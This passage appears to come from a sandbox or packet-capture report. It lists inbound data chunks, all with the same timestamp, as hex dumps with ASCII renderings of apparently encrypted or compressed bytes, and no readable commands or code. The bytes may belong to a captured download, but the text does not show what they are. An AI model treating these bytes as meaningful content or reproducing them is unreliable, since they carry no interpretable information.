2023-09-07 07:31:08 UTC	114	IN	Data Raw: cd 9e 9a 7b 6d ce d0 96 88 93 e6 3e 81 8c 12 d9 09 34 f8 3d 7e 1d e7 f7 e2 59 9b 41 3c 5a a4 21 d1 27 03 d4 03 22 09 ba 54 45 af 97 85 54 21 8d 6a ed 2a 4b 4f 6f 8e 4a 1c 2d 2f e6 9b be 30 cc 21 74 e6 31 60 65 29 4b 6b 3c da 01 d1 e4 22 91 2e b1 09 ef aa ca 6b a8 f5 93 82 20 81 3a 48 78 77 35 58 2b 81 a7 e4 dd be 06 bb 1f bc fd 4e dd ae b0 fa 32 97 5f e8 7a 65 5c e8 24 1c ef 62 b6 c4 46 1e a6 01 2f 5d 94 fa de c8 b4 fe e3 ec 24 4b bf 1d 90 7b 1b 53 f7 d0 98 39 b6 ed 80 00 71 41 c4 be 10 9a 8c f5 75 a3 f4 bd 9e cd 99 f3 43 47 5e 53 07 e0 f5 65 4f 9c 7e 22 4b 9e 3e e9 1f 8a 03 81 ea 5c 63 06 62 88 c7 6c 55 73 4f 7d dd 5e 0b dd 45 2f 08 9c 77 e2 f6 85 24 dc fb 2e 23 e4 21 1e d6 36 a6 26 f5 06 c9 3e e2 de b3 90 a1 f1 a4 5b 1f 0e 7c 80 e7 8e fd 03 6e 7e 1d 06 Data Ascii: {m>4=~YA<Z!'"TET!j*KOoJ-/0!t1`e)Kk<".k :Hxw5X+N2_ze\$bF/]$K{S9qAuCG^SeO~"K>\cblUsO}^E/w$.#!6&>[\|n~
2023-09-07 07:31:08 UTC	115	IN	Data Raw: 54 16 dd b1 7c 8c 96 8d 45 e3 6e db 18 84 53 88 e0 7f f5 0c 3b 2a 59 8c d4 06 7e 1e 04 a0 8e 56 7e 51 4b e7 7c 7a cb af eb 12 99 34 66 fd e8 f8 f2 72 73 ff 26 87 59 ae 8d e9 2d b9 81 22 b5 63 b0 92 8d 86 77 d6 8b c7 47 fc b9 bd 86 da ab c1 41 c5 69 af 4b bc d7 b2 ba 6f dc c9 b4 9e 70 68 6c 17 43 be f3 5f 85 4b 85 6d ba 4f 99 b8 89 f3 13 81 d1 6a b4 b1 ca 75 78 24 7a b1 07 48 4a 59 ef 73 f2 9f 31 ee 5c 38 7f 4d 1f 2a 42 dd cd 90 30 9a 81 71 45 06 04 17 62 11 40 a2 ed db 2d 96 b6 eb 59 4c 28 8f 3c 3f 53 3f 07 0b 90 77 ee 8a b8 1a 8d b0 06 88 6e cb be 2c 62 cd 0e c8 2f 8a 12 0b 12 74 ce aa a3 65 cf 80 20 86 14 33 d7 23 93 57 34 de 5f fe b7 79 9a e9 5a 3a ae 04 b7 ee c9 38 cf 6c fc 14 76 3a 03 d7 44 a8 cb 16 53 ad 15 4c fb 20 2c 96 12 af ff 00 c8 5e d6 27 e8 Data Ascii: T\|EnS;Y~V~QK\|z4frs&Y-"cwGAiKophlC_KmOjux$zHJYs1\8MB0qEb@-YL(<?S?wn,b/te 3#W4_yZ:8lv:DSL ,^'
2023-09-07 07:31:08 UTC	116	IN	Data Raw: 2a 9f c3 47 d2 dc 29 f3 44 69 30 66 b2 e3 fe ba e4 b1 76 db c8 b0 c7 fa a3 8a 4f d4 51 6f a4 7b 77 62 6b 3b a7 42 6a c4 98 7d 16 23 d8 34 74 07 d4 9b a8 5e ee 02 e4 80 7d 90 6f 5e b6 3a 99 e2 7b e7 63 9f f3 f6 c7 1b 33 1a 24 65 e7 44 ea b3 b0 38 7f af 4d 7f 36 a0 2d 0b 6f 3b 89 e1 92 10 53 e3 e5 9d c6 20 15 be ca 5e 0b ef b5 2a 63 2e 69 ff bc 3d 8d 31 6c b3 59 1a fa 93 87 af 98 96 06 e7 3e 56 8c 2d 07 74 66 75 d7 b8 97 a7 7e a1 c4 9a 83 02 35 29 bc ec ab a9 72 40 f0 ce 22 99 8f 65 f5 f4 09 db be ba a7 87 39 fc b7 6d de fc c0 70 54 4a 84 06 60 aa b4 45 48 75 f9 3d dc d0 0c d9 ed a3 1c 30 5e b2 f9 e2 20 64 ff b5 ae f8 6b 3c a2 45 27 61 60 3e 43 38 49 54 91 3a c2 fb a0 e5 9e 12 cd 92 81 6c e5 57 49 99 63 f0 3b 6f 43 7b cc 92 c8 33 c0 46 8e f2 60 2d e8 0e cd Data Ascii: G)Di0fvOQo{wbk;Bj}#4t^}o^:{c3$eD8M6-o;S ^c.i=1lY>V-tfu~5)r@"e9mpTJ`EHu=0^ dk<E'a`>C8IT:lWIc;oC{3F`-
2023-09-07 07:31:08 UTC	117	IN	Data Raw: b0 de 1e 85 04 00 1d ae c6 f1 a1 17 b1 be 95 52 ff c3 04 f6 d1 e5 f1 d7 c4 a9 e1 bb 80 f4 e7 65 fc 45 00 40 ff 8e 52 71 04 c2 d1 67 76 2d 1b 3b 08 e9 84 82 29 5c e6 1d 08 05 f0 52 a1 53 25 ee 87 cd fa d0 7a 42 e0 4d a3 07 fa c2 55 bc 59 e1 61 54 a7 fb bb 99 a6 c5 57 ac d8 be 3c e6 c7 66 b8 a6 bd a6 d2 5b 1d 47 5f 31 86 04 02 0e c1 64 f8 48 35 40 d6 52 b4 a0 70 b4 d3 96 17 c8 01 f0 55 ad b8 88 96 a8 4e 9b db c3 5a a2 a6 7b c8 e0 b2 48 32 22 3e 7b 19 e7 8f 51 1f f9 10 fe 33 2c 06 00 b8 75 27 f0 6d 3a 0b db db 31 10 b3 96 c0 3b e5 f5 7e 92 10 9a bb 61 a0 ac 30 73 68 eb 1a a8 ba 33 36 a9 25 55 f3 c3 37 94 ca cf 1e 9b 40 c3 b4 22 be 41 e9 e3 18 63 bc f2 9d 41 7d a4 49 90 d9 06 47 6c 34 8d 85 aa ad b9 98 9e 19 d5 fd 4d 45 55 75 7b 9f a5 ec 45 8b 9c d6 26 c8 79 Data Ascii: ReE@Rqgv-;)\RS%zBMUYaTW<f[G_1dH5@RpUNZ{H2">{Q3,u'm:1;~a0sh36%U7@"AcA}IGl4MEUu{E&y
2023-09-07 07:31:08 UTC	118	IN	Data Raw: c6 4a 89 74 91 60 2e 16 7a 5e 13 a8 42 ef d2 d6 a9 49 29 59 59 b6 dc cd ad 4e c1 14 16 84 5a 65 fc 3b c5 41 bc 11 76 53 51 b5 bc 42 8f 34 49 b0 c4 98 75 82 e9 28 1c b5 13 d5 a6 86 fd 9b 90 9a 7f 89 c1 b6 7d 94 c2 49 bd 1e e2 ce 80 cb 4d 37 95 fa 7c d0 93 f7 22 51 29 59 d3 ee fd b8 80 ce 63 27 37 40 6c 0b 2f 62 11 6b 78 b0 82 84 21 76 c6 cf 42 45 2e c6 bc ae 90 f4 95 3f 9e 1c 3e 4f 91 40 80 65 7e d5 bd 6d 7d 57 7b 8f fa de af 05 9d 53 c5 87 7f 84 db 2a c7 64 7a ce 0b fe db 91 d5 76 36 06 dc 44 08 93 b9 b5 5e 46 7c 17 d5 df 5a c2 4c a1 55 37 09 0e 7e a2 19 7f 81 7b df f2 8c 66 2a ab 99 66 0a 02 23 81 25 dc ce fc 2f bc b6 75 d6 fe 47 14 26 7f 09 0f 44 be 85 e1 22 aa 53 17 75 26 88 7e e9 40 7e 05 15 cf 68 9c 47 5b 5d 40 8f ec 23 67 e2 42 f9 2d 6f fd 32 7e 87 Data Ascii: Jt`.z^BI)YYNZe;AvSQB4Iu(}IM7\|"Q)Yc'7@l/bkx!vBE.?>O@e~m}W{Sdzv6D^F\|ZLU7~{ff#%/uG&D"Su&~@~hG[]@#gB-o2~
2023-09-07 07:31:08 UTC	120	IN	Data Raw: ff a8 ae af f5 08 99 f7 55 f6 b7 57 4f e2 35 26 d7 e2 69 fe 3e f9 79 ff 03 e9 9d aa af f6 be 80 3f 08 2f f3 4b 51 e3 9b d5 74 d7 16 6e 32 96 8e 63 69 bc 26 d9 3a c5 9a f4 b7 ca 8b c0 ca 5c 59 91 9b 09 4e 4d 26 30 a8 d8 84 c8 c0 aa 1d 3b df 81 db d9 2d 40 18 63 6a e2 bc b4 f4 a1 2d 43 e9 7e e1 2e b3 fb 50 bc 4f bf 5e 67 34 f6 65 72 26 0a 6f 4d 8f 9b 3e 2a 60 73 63 1c c9 4c 49 ff 21 ee d3 05 c1 9d f7 8c 86 f5 59 74 6b f5 fd ca 9b 20 c8 cf 10 c7 f7 d3 7c ba 0a fe f7 fa 20 dc be 71 de 3d 4f 47 50 bd 0e 6c 52 26 7d f6 2e 57 2e 9b fb 70 8f c7 d9 a4 d7 c4 a6 46 ec 25 0d da 01 8a 47 5f e1 a1 c9 87 db 46 88 3d 2a 26 f5 a8 28 00 c0 94 9b 0d f0 86 a5 cd 6a e8 14 e4 85 39 a2 dd 31 d2 04 cb 9d 28 bb 89 b2 34 de 8d 0a a8 93 b7 39 72 bf e8 93 11 d7 95 b3 9d 9e a1 94 80 Data Ascii: UWO5&i>y?/KQtn2ci&:\YNM&0;-@cj-C~.PO^g4er&oM>`scLI!Ytk \| q=OGPlR&}.W.pF%G_F=&(j91(49r
2023-09-07 07:31:08 UTC	121	IN	Data Raw: c8 79 57 df 77 52 e5 11 68 b0 e5 e4 bb 07 3f 34 da 03 26 e4 cb 4f b7 25 39 97 86 78 6f 8b 93 9a 6b cf cd ff 84 03 fd fe cd 9f 3b 1f 8e 90 c8 01 a3 34 5e 97 2f 45 8e b6 06 65 05 a2 3c 56 69 77 21 50 6d b7 1c e3 32 86 9d 95 53 fb ef 80 3a 57 03 d5 57 1f de 09 da b5 30 fd d8 13 5e 9a 98 73 6a aa 02 c5 2a fb 3c e9 aa a6 c6 bf 98 8a fd 9c bf d5 d4 b1 7c 8c 68 ef 79 ca db 5c 90 03 c8 a5 ce 3e c1 80 b7 a6 7d c8 d8 5c 29 16 98 fe bd 78 68 5c 65 f5 25 28 90 ff ad 11 30 6e 24 b6 a6 fe e9 92 6b 88 46 eb 28 d7 e8 84 61 ab 81 22 b5 b6 ee a8 cc 58 e2 53 10 28 b8 51 67 60 50 33 06 44 fb 51 61 32 95 75 fe c9 c5 3a a6 89 61 49 b8 ad 92 c8 d2 48 34 ce 25 e6 2c f9 45 a7 70 0c 75 17 cf e8 43 d2 56 ee cf 74 6d 35 bf 7c d8 86 75 09 95 24 54 42 0b df c2 e4 b3 bc df a1 de 5c 55 Data Ascii: yWwRh?4&O%9xok;4^/Ee<Viw!Pm2S:WW0^sj*<\|hy\>}\)xh\e%(0n$kF(a"XS(Qg`P3DQa2u:aIH4%,EpuCVtm5\|u$TB\U
2023-09-07 07:31:08 UTC	122	IN	Data Raw: 84 2e c6 f3 f9 f4 4d 00 d0 f6 1a fd ec f7 db c7 30 cf ed 34 fe a5 40 c8 e7 7d 09 3c ee 52 39 c5 d5 54 87 d3 94 25 3d c2 81 32 25 96 1a 3e 03 a9 19 21 01 30 49 b5 c5 35 3c bf e1 71 20 3c e9 ad 6c 66 12 88 2c 5a ee e3 a7 f8 64 f8 fb b1 4c 50 f5 92 f2 7e 86 ec 99 55 98 0c 02 fc 2c be 6f 54 a2 55 6c 2b af dd 5f 49 8d c7 d5 52 f2 4a 66 19 04 53 60 d0 48 6a 4a 95 22 1e 0b cc 53 a6 9a b2 7d b5 7f 88 98 bf 90 83 e6 d0 02 9b 00 24 d7 62 7e 6d 73 9b 86 df 59 38 50 8d a8 d5 0c e2 84 e3 36 61 08 56 6e a9 26 60 9b 75 86 8e 7e 21 99 e2 7b 4b 79 eb bf 04 62 b8 c2 b6 9b dc cd 6b d2 9d 67 66 10 8a b6 5f 37 9c 1c 3f d1 fc bd e5 8d 3c 77 9c 85 fc a2 dd 74 ab b7 9d af 52 47 cf 91 ea 39 80 cd 50 11 04 35 a2 ae 59 ef 93 c9 d1 93 0a 92 70 ab 20 4f bf dc 85 e8 fc 42 1b bc ea 5c Data Ascii: .M04@}<R9T%=2%>!0I5<q <lf,ZdLP~U,oTUl+_IRJfS`HjJ"S}$b~msY8P6aVn&`u~!{Kybkgf_7?<wtRG9P5Yp OB\
2023-09-07 07:31:08 UTC	123	IN	Data Raw: 43 de d3 e6 8e 41 b1 3d 7d 7c 7d 61 7b b8 d6 b8 db 5b f3 f5 40 95 8b c1 90 48 1c 89 c7 a6 71 3c fa dc 9d 09 68 06 96 30 3e a2 e1 b1 f3 f2 d6 5f 72 df f1 e0 c1 2e 57 2f 11 d4 76 4e 5d 03 04 19 46 61 6b 19 08 80 87 8d ca 25 36 73 b2 2b 99 66 49 08 1d 36 78 a7 bd 43 3b b1 16 06 3f 7e 5e 1c 4e ca f6 4f e1 cd 18 6e 5d 9f c3 c5 e6 a4 fa 88 06 f0 f8 64 fa f8 f2 69 17 4b 5c ed 5d 59 40 8c 72 56 80 6f 5a 5d 2a 7b 1e 79 44 0d 3d 72 0e 80 0f a2 e6 89 3b 57 f5 c7 80 40 d1 94 ba 7d ba 9b ef ab c9 ad 13 92 b5 e7 09 f9 08 fc ad 53 25 ca df 92 ae f2 45 61 c8 72 89 1b f0 a9 2d d3 bd 9c b9 52 50 0b 73 f8 f0 1e f5 27 66 09 b7 6b 67 c1 1f 23 33 24 46 cc d2 8a 96 f3 4f d7 5e ff 72 c3 45 c1 78 20 8d 1f 10 e5 e2 e0 2d 7e a0 74 02 f0 d2 d4 f5 02 99 42 73 be c5 67 b1 44 42 1c 45 Data Ascii: CA=}\|}a{[@Hq<h0>_r.W/vN]Fak%6s+fI6xC;?~^NOn]diK\]Y@rVoZ]*{yD=r;W@}S%Ear-RPs'fkg#3$FO^rEx -~tBsgDBE
2023-09-07 07:31:08 UTC	125	IN	Data Raw: 09 c5 c8 e1 29 cc 2a 24 a4 65 28 1f 47 1e c6 99 63 ad 45 9e 18 ed f4 ec e6 ce b8 26 a4 05 82 6c 14 41 29 3c 2a 5d 7c e2 85 03 7f 11 d3 41 71 ed 8d 83 1d 0d c9 62 81 87 be eb 41 62 4c 18 eb 16 fe 1b 5b 84 4d 08 6b d7 e4 af 0f 98 31 ab ed c3 34 f0 3a de 80 44 65 4a 77 f9 65 45 28 cd 45 2f 08 7b ec f6 d9 25 8a 75 41 89 96 90 45 d8 3e 83 17 9c 5e a5 0e e4 f4 a9 d3 e6 ae 0e f8 6a 34 72 1f ef 9b d7 fe 0b 6e 7e fd 3e f2 a6 27 bd 70 4a 6e 88 05 c0 17 c5 95 a1 f5 70 7c 99 44 db e1 3f 77 58 9a 50 eb 90 ae b8 13 d2 bc 56 ba 54 d7 69 ec 03 62 a2 61 bb c1 ad b8 06 d1 43 09 42 c3 b3 05 66 8d 77 3e 4d 94 e2 a9 67 f8 d2 c1 b6 7a 43 2d 58 53 32 1a 1e 68 32 2c 9a ef ea db d0 5c 36 8e a2 30 1f 7f 9d e8 6d bc 09 d0 b5 19 8b d3 96 5b 8b 43 5c da 81 b7 f1 f1 9e 22 e4 d1 f5 83 Data Ascii: )$e(GcE&lA)<]\|AqbAbL[Mk14:DeJweE(E/{%uAE>^j4rn~>'pJnp\|D?wXPVTibaCBfw>MgzC-XS2h2,\60m[C\"
2023-09-07 07:31:08 UTC	126	IN	Data Raw: 16 37 99 85 e4 a7 7c d8 86 af d7 4b 51 8b 9e df 36 4b 3f 6d 45 7c 00 4c c0 99 99 2f 9b 0f f7 c3 82 e6 df dc f0 98 6e 26 0a 35 96 b6 eb 2d a7 e6 94 52 6d 3c 64 66 46 90 57 f8 94 bc 15 87 50 6a 89 3c 8a fa 67 04 ef 2d b8 35 92 09 33 57 63 c3 eb d2 1d 99 0b 05 f2 76 c8 1d 8e 20 a3 db 38 b9 14 51 8e 26 46 e4 91 6b 56 ce 23 63 95 58 75 f0 14 76 67 cb 6c 64 99 0a ce 84 6e c2 b2 2f 84 cb 23 18 84 f0 2b e4 68 a9 e9 75 ce 9d 9a df bb fc 06 02 2e ed 4b 6c df b2 ea 5a d8 26 32 20 88 94 64 7a ae 1d 85 25 d7 87 c0 96 f3 bc f4 dd 11 71 ee 69 fa 81 2a cf d6 40 33 e2 5b db 15 14 03 0b 7a 2c 02 d3 94 bd 09 92 5a b7 62 00 70 ec af 6d bd 22 d2 73 16 84 76 9a 73 9d 9d e3 06 bd b5 db d4 af a8 3e 21 8a 89 d9 10 fd b1 08 96 83 33 98 4b 6a ba 7b 32 27 ef a9 cc 32 eb 36 76 8b 31 Data Ascii: 7\|KQ6K?mE\|L/n&5-Rm<dfFWPj<g-53Wcv 8Q&FkV#cXuvgldn/#+hu.KlZ&2 dz%qi*@3[z,Zbpm"svs>!3Kj{2'26v1
2023-09-07 07:31:08 UTC	127	IN	Data Raw: 99 b4 29 6f 96 02 49 40 4f 0c 9b c1 e8 64 8a da 00 6d b0 8b 6e 89 0f 1f a8 7e a1 c4 4b 23 19 1c f7 2f 7b 24 06 bc 9d 20 c5 22 99 f3 76 31 ed 5c 2c 49 29 60 20 1b eb 59 e3 0d 0e d6 51 19 4d 59 47 87 42 1e bc f8 21 e7 25 d9 ea 8e 62 eb a3 bc 6e aa ab d5 3b 13 1a 80 c1 be c9 b9 e5 60 c5 5e 55 d7 d8 00 38 10 17 ea 3a 0b 34 69 36 98 b6 58 29 e7 02 87 31 20 ea 0b 7d a3 e1 d2 a7 8d b5 b4 51 b9 fe 93 bd 65 11 d6 70 ac d1 72 56 63 f5 5f af 29 d5 da 95 d2 ce 45 97 c3 55 77 3f db a3 4d 3c 99 f0 1f ad d3 45 1f b6 ff 8a 35 b5 c4 fb a9 84 fc 9b 4f e1 25 70 98 1b aa 99 60 5b da e8 bb ac 7c f6 b6 5c 94 09 23 b7 2b ee 2a 85 a0 a0 51 53 82 54 52 3e 90 5b 80 c0 66 d8 e8 ee 59 9c 3e cb 47 43 b0 7c 8c 81 1d 5e c0 0a 2d 19 84 53 29 de e2 3c 9a 1d a0 5f 8c d4 d0 e5 f9 df 38 6f Data Ascii: )oI@Odmn~K#/{$ "v1\,I)` YQMYGB!%bn;`^U8:4i6X)1 }QeprVc_)EUw?M<E5O%p`[\|\#+*QSTR>[fY>GC\|^-S)<_8o
2023-09-07 07:31:08 UTC	128	IN	Data Raw: 6e 29 c5 db 96 13 08 c3 1f 6d 9b 6f ac 27 06 7b ca f8 f6 3a 96 58 a2 a6 f4 dd c7 08 ab 8b d6 3b 7b 19 e7 6c c6 30 c7 91 26 eb f3 02 39 c7 31 b4 7c 37 26 e1 48 69 93 6d d5 cb 9d 9c df 97 5b 61 f4 7f 54 c4 0c 00 9e 1f 26 e3 a2 21 39 a9 b0 8a 31 af fe 45 51 a3 53 04 0f 83 50 c8 f2 15 00 d7 6e e2 39 77 3a 74 3a 0f 41 7d 0f c2 91 4b b8 fb f3 c3 1c 2e 08 37 1f 0a fe 60 48 c2 c0 e4 da d4 20 10 3a e3 29 fe ab 2e df d4 4e a4 fd a6 ca 37 02 df 86 d3 94 84 a1 89 50 9a 70 1c c3 b7 d1 88 26 d7 cb 6a 1f dc 8b 73 55 e3 5a cb a1 bd bc 2e ed a6 08 95 36 07 67 62 3e 76 4a a0 35 32 2b 2a 97 f2 e1 ea 1d 6f 23 e2 4a b5 75 9f 6b f6 24 06 96 74 45 06 fc 9e 57 49 82 fe 1e ec fb 5e b1 c3 c6 d3 02 7e 88 ad 5d bf 3a 06 06 5b 8f c9 85 b2 48 d2 48 f6 d6 f8 d2 ee a8 96 57 db 10 a9 ad Data Ascii: n)mo'{:X;{l0&91\|7&Him[aT&!91EQSPn9w:t:A}K.7`H :).N7Pp&jsUZ.6gb>vJ52+*o#Juk$tEWI^~]:[HHW
2023-09-07 07:31:08 UTC	129	IN	Data Raw: a8 99 7f e4 6e fe d6 7d f4 90 a9 25 a1 72 95 e9 f4 8a 13 46 26 90 fb e8 c5 b4 02 db 64 96 9c 67 85 86 1d e8 1d 41 ea 3c 13 dc cb d6 e2 fa 52 21 c2 e0 0d cd 8c 34 24 9e 06 a3 d2 8c 3b c5 7b 9d d8 20 6c 4f 89 5c 6a bd 7a ba aa e5 18 5e c8 cd 41 3a 10 05 50 17 22 e4 5b 97 0c 15 f7 11 7f cf 99 e1 5c 24 6d 63 aa 20 c5 22 f2 11 Data Ascii: n}%rF&dgA<R!4$;{ lO\jz^A:P"[\$mc "
2023-09-07 07:31:08 UTC	130	IN	Data Raw: 4e bc 5d 55 02 41 b7 c5 f4 67 90 43 49 15 52 0c 09 d9 a6 18 22 a2 1c 82 81 96 1e 98 9a 51 0c 94 e0 a7 6d 3c e0 33 78 f1 b2 60 de c7 d2 ae e6 b6 e6 e3 e2 11 49 d0 e0 a3 d7 2c 01 1b 49 d3 46 b2 ba c7 01 12 15 99 36 44 61 a1 d1 96 da 3f 30 5d c4 10 e9 1d 89 7f 78 63 1f f5 ba 5d 4e e9 16 44 73 41 c6 58 3d a6 9c 0f 90 bb 60 14 30 ef cd b3 d2 8a cd 6c 36 c7 a9 27 a8 9e 83 31 75 25 3a e4 28 3b 34 b6 2b 56 80 4c 2d 7a 77 ee 25 05 21 7d 61 24 63 d8 3a a8 ee 9a 3d 49 85 c7 80 40 40 3a af 2b 1b 2b 08 a8 c9 8e 54 18 ba 5e 16 17 e6 85 db 53 25 0e f6 d8 a5 b6 68 6b cf 7b f7 42 da c2 55 bc c7 db b7 52 5a 5c f3 2a 74 26 a1 6d 35 57 04 0a 0f 8c 59 af 7f 69 18 83 dc 5f 96 f3 70 7e e8 f9 28 0e 17 9f 31 22 d4 52 40 9b ae ac 73 1c ac 74 02 9d 57 ad 27 86 7b b1 95 b8 11 c0 5a Data Ascii: N]UAgCIR"Qm<3x`I,IF6Da?0]xc]NDsAX=`0l6'1u%:(;4+VL-zw%!}a$c:=I@@:++T^S%hk{BURZ\*t&m5WYi_p~(1"R@stW'{Z
2023-09-07 07:31:08 UTC	131	IN	Data Raw: 6d 8a 73 e3 f3 79 d4 d7 f0 32 a5 fb 78 da ad c7 52 29 d8 9f ff 8c 92 2e c4 c6 f4 ae fb c8 0f 79 ad 12 9c cc 09 4f d5 e5 a2 a5 bf ed 85 0d 60 e4 ed a9 10 e0 8b 23 00 03 c8 59 95 7a 80 e4 41 62 47 e0 18 e0 fa 98 4c 2d 6c 0e 49 fd 3d fa 0a 9f 31 f6 ed 58 66 00 37 b1 99 ed 44 5c 73 28 f2 21 00 da 45 05 15 0c 76 e6 aa e2 8a dc 60 a3 9f 16 91 84 74 a4 17 20 4d 97 5a 80 e5 1a b7 a7 c2 1b 8d 84 09 16 68 99 ee 0e e8 e3 60 68 1d d9 61 4b ac 27 f2 d8 e2 63 cb 57 85 d6 12 56 47 e3 ee 4f cf 17 69 a6 c4 d8 02 2a 60 16 01 cf 1b 3a b2 8a f6 e5 a5 2e 5d b1 dc 79 73 d6 da 58 81 b4 f7 3a 81 dc 57 9d 88 2a 5e e2 b8 9f 1e 8d 03 77 f8 78 cb 1d a4 f1 54 58 0c 8b 7b 05 2f 4e 74 17 96 a3 8b fe 0e cc d4 db 7d 10 3a 58 b5 0f d5 5a 94 09 52 d9 bf cc 5b 33 53 ab 97 ec a2 cd 60 13 af Data Ascii: msy2xR).yO`#YzAbGL-lI=1Xf7D\s(!Ev`t MZh`haK'cWVGOi`:.]ysX:W^wxTX{/Nt}:XZR[3S`
2023-09-07 07:31:08 UTC	132	IN	Data Raw: 3e 8f 0b 8c 32 4d bb a9 ed b2 7c 7f 86 7f 58 ed 73 07 17 8c 8b 96 b0 f0 cb 7e a1 ea 5d 07 01 ab 0a b9 e5 0c 86 cb dd 13 87 e8 32 7d 56 35 96 25 e8 88 b0 69 aa e5 62 67 78 62 5e a8 1d bc 9f 77 1e 85 5f dc a6 60 8b fb 67 30 92 f6 95 bf c6 49 53 e2 35 c9 bd a2 65 df 4a 78 b7 f2 9a 7e 8a c5 f3 de 78 f2 55 09 ef 7f 44 e4 91 01 bc 9b 78 3e 8a 43 6a e8 14 b9 63 4f c4 0d 99 44 29 37 9d 2e 44 eb 20 9b cd 23 41 eb 2b 57 68 a1 11 d3 bc be bc 11 a3 d3 24 30 0f 5e 45 2c e9 92 cf 77 f8 33 43 56 bb a2 40 f5 8e 79 f6 15 ec b5 d7 24 fc e1 f6 c5 5c ed 91 7c 93 ef 43 d9 d6 64 30 27 35 2c 45 59 f4 84 80 db d9 db 94 63 06 e0 28 6c 04 f4 2b 23 c5 63 e0 78 8e 3f 66 84 3e c3 2b 63 c0 08 74 f0 f5 a7 98 1f cb 67 23 a4 89 6b c0 50 af 60 ef ed 4b da 48 37 b8 67 30 e7 87 16 f4 58 9b Data Ascii: >2M\|Xs~]2}V5%ibgxb^w_`g0IS5eJx~xUDx>CjcOD)7.D #A+Wh$0^E,w3CV@y$\\|Cd0'5,EYc(l+#cx?f>+ctg#kP`KH7g0X
2023-09-07 07:31:08 UTC	133	IN	Data Raw: 79 dc 28 b9 9b fb 85 cd 8f 12 4a 16 cf 21 86 32 e5 68 2c 61 03 59 b2 be 7c 0d 1c 65 a2 28 21 08 a9 a0 9d 03 a7 6f b9 c0 d3 3b cc 13 cd 16 9b a5 45 3b 9c 7b df e8 3a 53 f5 f0 3f d7 a2 ed e2 ea 53 1f 4b f0 02 bd 2d a7 d1 13 c8 74 ca 62 87 57 7d 95 a1 4a b0 b0 fa 22 eb 80 5e 57 2e 4d 0e 3b bc 9a 41 e5 81 48 8c d6 d6 ee 99 2e 3a 8f ff de e7 1c f3 58 89 15 c8 52 f0 94 66 56 e8 3d 6f 60 06 00 b7 b2 51 d0 2a 6b c9 49 10 1d 52 20 50 ad a6 14 59 d2 ad 2f d5 5b 80 8f f3 46 81 a1 57 fb ae ff b6 b6 df e7 0c f8 51 5a f4 7a 54 0b 7b 35 56 a0 0e 1c 60 94 64 21 1e e5 7f c8 1e 26 68 c3 cd 33 2a e7 29 e8 68 4a c6 8d d8 b3 30 7a 53 04 27 a3 a0 85 5e 05 2f ec 27 1e 3e 65 a8 1f d9 ef e0 ca 29 44 6d da de 27 7e 8a 81 c3 06 0c 55 de 18 8e 50 a5 56 84 d0 3b b8 d8 5d 8a d4 2f 6c Data Ascii: y(J!2h,aY\|e(!o;E;{:S?SK-tbW}J"^W.M;AH.:XRfV=o`QkIR PY/[FWQZzT{5V`d!&h3)hJ0zS'^/'>e)Dm'~UPV;]/l
2023-09-07 07:31:08 UTC	134	IN	Data Raw: 9f 37 40 18 70 cc af a8 ac 23 33 71 74 04 f0 f2 a9 ab 04 7d b1 f0 4f cc c0 5c a2 71 f0 02 d3 e3 83 95 ff e7 7b 1f e7 f5 16 8e a2 a4 35 7c f1 a9 17 be 75 f7 33 a0 40 b3 1c b6 e0 c1 b3 90 c0 7a ad 3e 3d 27 b4 f1 16 1c 0c 06 8e 26 d4 8d 9d a5 ba d0 34 c6 3a a9 fe 4f ac c3 5b 6e 96 69 d3 8e 2e c4 0b b9 eb e8 25 21 ba f8 c7 13 34 fd 9c cf 92 40 0a 6f d3 4e ce f8 e5 a2 5c d7 1b 8d a5 5e 8a f3 36 3c cd 91 6d 0a fd f0 b7 28 d9 14 1d e9 d1 28 93 0f d1 50 9b 85 14 d4 3f 7e 8d ec 32 4b d3 a2 cd 3b 54 8b e5 e9 95 30 83 64 fe 5b eb 27 a0 48 05 93 59 4a 14 90 b8 8e 7e 34 be f0 fa 76 64 7d 7f b5 41 3e 60 b5 9d cd 20 f3 82 5a 82 df 09 8d 13 31 75 a5 2f 7e e1 c8 d7 00 9b d2 5d fc 2b 8b b2 d6 da f0 06 57 a6 be 47 c3 a2 c6 2f 73 ae e5 92 d7 66 37 70 8a 5a c3 c7 15 b0 c0 d7 Data Ascii: 7@p#3qt}O\q{5\|u3@z>='&4:O[ni.%!4@oN\^6<m((P?~2K;T0d['HYJ~4vd}A>` Z1u/~]+WG/sf7pZ
2023-09-07 07:31:08 UTC	136	IN	Data Raw: d7 0b 4e 20 c6 bc 01 d5 44 00 e4 d4 ff e2 90 db 8a 4d a5 97 d9 bd 6d fd 15 39 cb 1e f1 03 2f ff 69 e8 a7 51 af 78 25 4f 43 27 cc 8d 1f ea cb d6 e2 b8 93 d3 c7 1d 12 e2 b7 d1 47 ea 64 8f f1 a6 0d 27 4a 3a df 53 0c e7 a3 30 4d 8d 57 8c bb 5e 2e f8 cf a2 6e a2 03 2d 77 57 22 ca 78 bc 3c a4 e6 01 5a cf ad 8d 78 09 0f 44 92 8b d4 8e d2 de 4a 19 6b c9 13 f2 6f 7e 05 c5 3a 22 f3 b9 fa c8 e2 35 58 06 f4 5b f3 64 2b f9 fd fd 71 89 e9 64 39 c8 a2 c4 0f c9 9d 98 70 60 29 17 31 46 0d 55 1e 0c 3b 3b a6 a3 3e 54 39 e4 a8 fa b9 f0 ae a5 ba c7 01 8f 46 3c 66 52 14 fc ea 16 98 04 13 76 b2 bd 99 6b ba 53 0a 0f 47 a7 f1 39 31 b1 16 90 20 c4 80 1b 3e a9 9c aa b0 bb 60 18 30 69 d5 2d fe 8e fd 4c 05 62 a8 16 91 9e 83 b7 6d c9 22 ae 28 35 34 42 4e 56 80 6f 53 fc 7f 1b 70 96 22 Data Ascii: N DMm9/iQx%OC'Gd'J:S0MW^.n-wW"x<ZxDJko~:"5X[d+qd9p`)1FU;;>T9F<fRvkSG91 >`0i-Lbm"(54BNVoSp"
